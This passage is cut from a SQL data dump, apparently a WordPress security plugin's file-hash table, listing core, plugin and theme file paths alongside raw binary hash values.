��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cj?6f��N5�5H�6','��Il��s��&���x�jzQ�ꢓ���','',0,'?'),('����B�J�<�`��','wp-includes/blocks/post-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�]�]�?c�7#��~�','m)�_���Q�c�(�U4�蚈����u,�xY!1','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('�ؐg�x\rz�d;Q^�','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/�	@d��\r�+v�*(','',0,'?'),('���-o����mq�\0X','wp-includes/class-wp-block-editor-context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�~E�!�b���','\'���\r=F}�Lh��aIç��\Z�\"�$��Δ','',0,'?'),('��M3�vaBcd�','wp-includes/blocks/search/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��旂�','�jV&�H\\Y�?-Ͽ;f�\0v�%���<Ir�','',0,'?'),('�:��+��hy^W�','wp-includes/block-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7&�nL�V���T�b','�:����ݽk����������=�MĖ�r','',0,'?'),('�%���_���Hs��\n','wp-includes/wp-includes/images/icon-pointer-flag.png',0,'��,���E^�j`\'','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�(Oد���~�m}��%','wp-includes/wp-includes/css/wp-pointer.css',0,'HB���v��}�d~�','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Pɖ���3Tر#��','>㈳ec�¯f4s�7�8���#G�`�x��0��','',0,'?'),('�1:��9,׮n\"�','wp-includes/class-wp-theme-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��2�ﶈ������','�\0~�G^�,���:�V�/nM�����ig�','',0,'?'),('�@)` ��~O�}�ac�','wp-includes/blocks/heading/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DN��/Y��i`R','K���8���c�X�����D�0�d���|��J6','',0,'?'),('�Pm��bb滖�Ў','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-primary-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���������V���3','Z\n+�;�AW�u����viD�A�b~�(�m','',0,'?'),('�u��и�;����]!6)','wp-includes/wp-includes/js/dist/is-shallow-equal.min.js',0,'`�Y��5n��Y�2-�','`�Y��5n��Y�2-�','��Q�f�1��)ۡV�G�y�8�V�d���%','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ŧ�:�ٓ`�:','�&+u�)���{I���+�&/�Rx��_	�','',0,'?'),('��h���)UG@�x��v	','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�mTK��偏Uo','w��-]��m*�v�Ξ�~��_\"{�]�[O0','',0,'?'),('��N�w� Xΐ~�-ς','wp-content/plugins/wp-cerber/assets/flags/nr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��\"��6GK','EMkT^�f������a͘xg�6�o[','',0,'?'),('��/�����N.&R�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',0,'�N���>�EH�I��� �','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\'����7��,�c:','�&(��<��P�Z��m��%�����*A�&}/+�','',0,'?'),('��a^���\\\\0���','wp-content/themes/hitmag/inc/kirki/assets/vendor/wp-color-picker-alpha/wp-color-picker-alpha.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�X��2��g,̵���','1�%�H̓�����n����od[��','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������=��S6�v��','�{:G��:�ER���W\n�$I�m\r�\r�Dğ��|','',0,'?'),('�	Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e�>��-L(��','/tR4���̯�� ��T��Ez�ޑ*��\r�h4�','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�,.��<��@�G��','wp-includes/wp-includes/js/jquery/ui/effect-size.min.js',0,'�t(������D','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�4�����٫1�����','wp-content/plugins/wp-fastest-cache/images/pause.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O=r���/�8�K�','wm��zW�oG�rCvx_ߐ�k���2�0�','',0,'?'),('�8G�{���GV~EX','wp-content/plugins/wp-cerber/assets/flags/gu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���K�-����s�셡','���\rQ��S�G��b���`y ��J�hB','',0,'?'),('�<\0$�\rփ�\'(Ok�','wp-content/plugins/wordpress-seo/inc/class-wpseo-installation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���44F�Ie���)','�~^�E���G<��^�v�4�[��E5<��}2','',0,'?'),('�<ۣb�/i� !l��','wp-content/plugins/wp-fastest-cache/templates/update_success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�z��9v��','Ϧ�J/$\".*9�&Œ��� Z���B�u��g{','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�C��ݑ��=w%8P�','wp-includes/wp-includes/js/dist/reusable-blocks.js',0,'^�ގ�g��Ts؉f�','^�ގ�g��Ts؉f�','zt\r��j�Z\Z��H�ͼċ�!f����;��','',0,'?'),('�H_>9v�\n\0�}N!Q�','wp-content/plugins/wp-fastest-cache/templates/cdn/cloudflare.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��[\'0��$~�w<','�*w\n@�z\\N�X�� ��\'84�5���=\ZL','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&���9iї�R7�','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F\'#7d�ng��E','[/q��E�}���1%�[D�_�����ұ	\\S','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�lN���V','t��)�	�Ј74���A8��sk��ed�;af','',0,'?'),('�}����\'GT�O��','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aӽ�D[\0 �M�W��','j�L�8ń��pOw�f?�iaWȎ�\"��d�','',0,'?'),('���������R`E��','wp-content/plugins/wp-cerber/assets/flags/ro.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qh�=aq�΁Jm��d','<��<*]����M�\Z�k\\�MO6I�#�M`V�','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����I�l+��t�\0','K8�1�ָ+[�&`B�=�u��\\u�u5̙Ms�%','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^���XF8�L�g��/','�����z]m����R\0����yj9�T�z�g�','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�����h��١k�','wp-content/plugins/wp-cerber/assets/fb2b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}d��ΰ��R͵�','Ky�Y	�O~�vx�W�� �<3����PZPZ','',0,'?'),('�����.�$����2t�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ru.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��^}\0`2S[�kD�','�ϴZ�Σ���8�&S6,5SG���6�x\n','',0,'?'),('����7OPs�Ωp��W','wp-content/plugins/wp-cerber/assets/multi/multi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P?�� a��80�$','*}�AB�/�*o%���;���5��k��;�3','',0,'?'),('��7FW��m!w��SZ=','wp-includes/blocks/video/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��Ц�(��p����','ɩa@�8�*{�Ow����pǛ����|$�!��','',0,'?'),('��#����+�/�','wp-content/plugins/wp-smushit/app/assets/images/plugins-defender.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?}��7�77	\Zc�;W','���$A<��4���MH���^Jl�jQ(��','',0,'?'),('��\n�ӛIQED	��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:xϿC��G.�u�','c��O^��[�di��@������=lF@�w�;8v','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I}\n�Ѵ��M��\"_V','���8��h��s�+d�ƃ����*&�9ɯ�','',0,'?'),('��=t4��(�<E+��4','wp-content/plugins/wp-fastest-cache/css/fonts/statics/flaticon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�c ��s�ӫ�','�\r��Ϯt��������vHRSԙEL8c','',0,'?'),('��΢�s�3r���F�','wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css',0,'���\\��B���&�pw�','���\\��B���&�pw�','7>xV&v|­��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ����	+\'8k_','',0,'?'),('��-p�ڤ�*���D�','wp-content/plugins/wp-smushit/app/assets/js/smush-blocks.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F��er�xr�!2','��S���p6;�������+r�T�� ��(���','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��\0s�a���,�','wp-content/plugins/wp-cerber/assets/flags/fo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�6�+;G��+�Ln','�3�\Z�-5D	��6�p��\n��%�,��ɓ�&�M\n','',0,'?'),('��� _�~jw!�7�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/zh-TW.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z���Ե��qB��','$\'�_���j�iU�u���M��c��UtILf ','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�M�|���/k4F��','�:e�I/�Bƫ��R��\0���L��ޒ0d\r0r','',0,'?'),('��x-M���-�N���r','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	����-nB�	ˌ)�u','8@����9e{�Ӎ#�ң��n\nY�փ��L','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�8�Ö��z��ϣ�0��','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php',0,'�0���s0C{[��[t7','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V���	�9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�:5Q����c�$=*','��VpI������	_D�4UB��a$znl��!','',0,'?'),('�Q�\\�>:3���7','wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.kԒ��e�q9���','D���P���2\\؋~c�qM/���Y��*\'','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o��`,v]	� �','��la=�����2�ڤ�bp�G���#�봡`','',0,'?'),('�V�r�2Fk\0�<��h�','wp-content/plugins/wp-cerber/languages/wp-cerber-bs_BA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rD���.֡h�-�','`�A�\"��f�*�B2$e �Vr�̜��3��','',0,'?'),('�i�+Hv#��وR�q','wp-includes/wp-includes/class-wp-recovery-mode.php',0,' �oxц��<N��',' �oxц��<N��','�4>���\r�	j����s�dqm��H��l�7�~��','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JB�i�\'��N!��u�','Q��<3�)5����\n�����v߸���	�)','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jȳ����-y�]',')q�,f*��Q3�/�f�P��3K�l>u[6g','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X*0�F1\"8�`y܃','6a9��J�l�\r\\�)�f�\0��t�Q�M۩֣','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Œp�C�Qh�6T','�%b��п1^���W���S��~:�4�y���','',0,'?'),('��@���d� ��{���','wp-content/plugins/wp-smushit/core/class-configs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�\n�f�L̲��^7Ɉ','�x��Y)��p\"�k�TIIťpp��u��','',0,'?'),('��X�\"ɘ���c52e8f','wp-content/plugins/wordpress-seo/src/integrations/admin/helpscout-beacon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dr�X�@6|F���','�����Xaﳮ�\r8U_�Hw�6���^y','',0,'?'),('��\nL0Qod`�\\�;�','wp-content/plugins/wp-cerber/assets/icons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T4�s�bRߺ0�','v	�QNԯ�L�|̗E��,@���8By�:Y��','',0,'?'),('���B��u��d�Y','wp-includes/wp-includes/class-wp-feed-cache.php',0,'\Z��ط?h\"��%c��(\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~��܏�4��','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('����m��{�@�m�','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLFʒ4��i�--','���Cc#1_��|��Z  ��1��ɾ���Yx�','',0,'?'),('�����ܚh8��#�J�','wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php',0,'(��ch�L��F�3�b','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('���Q��s����ܰ\0','wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php',0,'nM@<��A6�@!�Y��','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('��`���\'��,�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M1m/�VY��W.2 {','�*��ԃ\'�&�@X$�\0h%%��X�i�);�^','',0,'?'),('�\n�\"Y|�v���oE��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Р�2��\0�l��Yx�$','D�V����]�\\�P���f�y�K�u�a�m��','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̧��Wd��~��.','�Ak��Ӳ�f�4�:_a�=1�h��\Z^y�','',0,'?'),('�@���뵰On�','wp-includes/blocks/html/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�Re���mƅ�','v#�pu��h�1�>ҿ�٫��3����6�','',0,'?'),('�%+�:�w�P\"�y�h','wp-content/plugins/wordpress-seo/admin/views/form/select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�N�@��v� M)�','�l��b)������%T�Yt+\\�rE�M�Pl','',0,'?'),('�-Ob�G�?Ou�uhl','wp-includes/wp-includes/class-wp-block-styles-registry.php',0,'Kc�����\0z�[>�\rY','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('�0�<��0�\n�q	�','wp-content/plugins/wordpress-seo/js/dist/api-client.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�8M��u��M�','Q(+[�L_���)�>z�Ħ�n<K|�!k','',0,'?'),('�;�B�y�Ů�O\n!R3','wp-content/plugins/wp-smushit/app/assets/images/graphic-hb-minify-summary@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[h+��Q�m&�h�p\"�3','߼��iK�l��4҅;|�����@tݸ�޵�','',0,'?'),('�O����/m��.U�5�','wp-content/plugins/wp-cerber/assets/flags/sr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�׼��Є��+p[b�','	#�K�,�Xf��d?����`��������^XM','',0,'?'),('�Rz��/_�8�@\'�!�','wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-permalinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���95:#���J�c{�','y[�&�m��`����*���w��]-ƃl\\','',0,'?'),('�VXg!xOI����{�A','wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@(Ѻ�牢jU�W','��.��\n��EƯU(�$��\"�\r�D����1�C','',0,'?'),('�hL�W���.�@���','wp-content/plugins/wp-cerber/assets/flags/gb-sct.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o����WNmqYQ�)','���bH�IRX��p�q�tff*N�4Ǩ','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�z���O�M�&�K�|�','wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php',0,'r-�e��r^�!�~','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�󞮣Py�n','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����֢��ą�8�}','��n(.ӧG�7���;i�W���,�k�]�','',0,'?'),('�����_����C6:�','wp-content/plugins/wordpress-seo/lib/migrations/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(G��3-a Q����;c','�uoNz$���K��6�u@���w�?4<n�\"{�\\','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�\n������;��a�','����@+��rg_ʙ֙�h���4-c�QW��k��','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uiD�7Ǎ��C\0�,','�/�b�^u,�ʲ`�XJ��x �~�\Z��C��','',0,'?'),('�����z(�d�\'dIt�\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�);D��\r�<S��Ϳ�','{j!^n?-�	-J\'��ͨ����$\Z���','',0,'?'),('����xyO�MQ��,','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/is.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��xb������','��4&�Q⼕]8Z>6�#D��#����e��3ȣ','',0,'?'),('��p��������2M','wp-includes/wp-includes/js/wp-lists.min.js',0,'��uP��*�L�[�C�','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('��[	i��1Dd I�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ja.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-8zk�e)V��W��݁','+��	6��\'�/��,�~m�詣�q6m��_�]<�','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\-�op�`Os}B�','/�];�%X_�kz#O�a�;���H�ߟ�','',0,'?'),('���ب�R	�C%>)��','wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js',0,'N���x���:��cT�','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�����m*�$�','wp-includes/wp-includes/js/jquery/suggest.js',0,':$tV�E�ʿ���',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('�$��Ld�N�B��1','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��QhM��a�2','j��n���e\r���ݟ7{I��\Z*h$�.','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H����֬�����','hw����,�Dz�&�t��=#]$3���b��','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�����t��$E1','\'fB�Ђ+�N|�[�����Dx\\g��SLAs��_','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('����e��7�F�%','wp-includes/blocks/post-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�Ι0�Yl%��&�|_','ߵ�О.(�����\\���ƢP%Qv=F','',0,'?'),('�*��K��M9��¬t{','wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js',0,'��k+%�5l3�!-��','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('�-�šw�Voyvϭ$N','wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js',0,'�ȷ��� ��m�7','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����3d�Š��','��-���Ȯ�8����&ܯ�7̝�Z(�','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�MQQ�/V�AN��','y�fz5j�\0=�8tA�\"s�mB#����zuE�(@','',0,'?'),('�U,�w���Q-{[�','wp-includes/wp-includes/js/colorpicker.js',0,'��V g�����-�','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('�U�R������M�,','wp-content/plugins/wp-cerber/assets/flags/mr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�E�?�$�@W�m�@','F�8\ZQc8�dxR�	��4ދ�Q�Z�{xay����','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����w\n�Mus���','O���=~jc#�6��L窜����as�W�OQ-','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�7��M��U���','���6If�:�]2���w~�� �`��Z~G�3^','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���5����ժ�z','_4�׽���9ly4;��06yt��I(O�5�','',0,'?'),('„2�`ZeU�T���','wp-includes/wp-includes/js/plupload/plupload.min.js',0,'���6�JJ�7�+�','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('Š�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';gh~BdqAa(���%�','���mkA�i�9�\\\n�~<W�I�a���Ot<$','',0,'?'),('�����ġ!����\Z','wp-includes/blocks/categories/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ԏ�\nI�ŏ�69','�S�`t��$uÖ�7%��M�F��?�%:?�','',0,'?'),('��ޞ;�z����','wp-content/themes/hitmag/inc/kirki/assets/images/3cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)��\'�:�ת�','Gl�	Z�@]�,�Δ��a�Sq�?��;�]e','',0,'?'),('���Ň�a��A�','wp-includes/wp-includes/js/backbone.min.js',0,'��`ft7\\J�*��4a','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('’T`+F�.A�s�','wp-content/plugins/wordpress-seo/src/surfaces/schema-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ž�ّ/_	